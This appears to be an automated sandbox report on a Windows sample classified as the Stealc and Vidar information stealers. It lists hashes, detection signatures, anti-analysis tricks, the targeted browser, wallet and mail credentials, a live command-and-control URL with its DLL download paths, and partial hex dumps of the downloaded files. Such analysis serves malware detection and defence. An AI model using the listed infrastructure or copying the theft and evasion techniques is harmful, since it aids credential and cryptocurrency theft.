Windows Analysis Report
random.exe

Overview

General Information

Sample name: random.exe
Analysis ID: 1597958
MD5: 1f8c1aad2738a582d7b549ced4b647ea
SHA1: 073bd80fb416fe7cc74244798a0f323dc3907ce5
SHA256: 4a646bae75d97282a043aa8fc8837ceb407c947c7abeb83c8f2f12dba1a7017c
Tags: exeStealcuser-aachum
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

barindex
Source: random.exe Avira: detected
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dllN Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php$B Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dll& Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dll= Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpware Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dll. Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dll. Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpJkBL Avira URL Cloud: Label: malware
Source: http://185.215.113.206/lIL Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dllP Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllB Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpata Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php8B1 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpoge Avira URL Cloud: Label: malware
Source: 00000000.00000002.2551905997.000000000150E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: random.exe Virustotal: Detection: 56% Perma Link
Source: random.exe ReversingLabs: Detection: 55%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: random.exe Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\random.exe Code function: 0_2_6C986C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C986C80
Source: random.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49839 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:51102 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:51120 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:51121 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: random.exe, 00000000.00000002.2562518741.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: random.exe, 00000000.00000002.2562799015.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: random.exe, 00000000.00000002.2562799015.000000006CBAF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: random.exe, 00000000.00000002.2562518741.000000006C9ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\random.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: chrome.exe Memory has grown: Private usage: 1MB later: 29MB

Networking

barindex
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49710 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49710 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49710
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49710 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49710
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49710 -> 185.215.113.206:80
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic TCP traffic: 192.168.2.6:50980 -> 162.159.36.2:53
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 Jan 2025 18:46:12 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 Jan 2025 18:46:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 Jan 2025 18:46:38 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 Jan 2025 18:46:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 Jan 2025 18:46:39 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 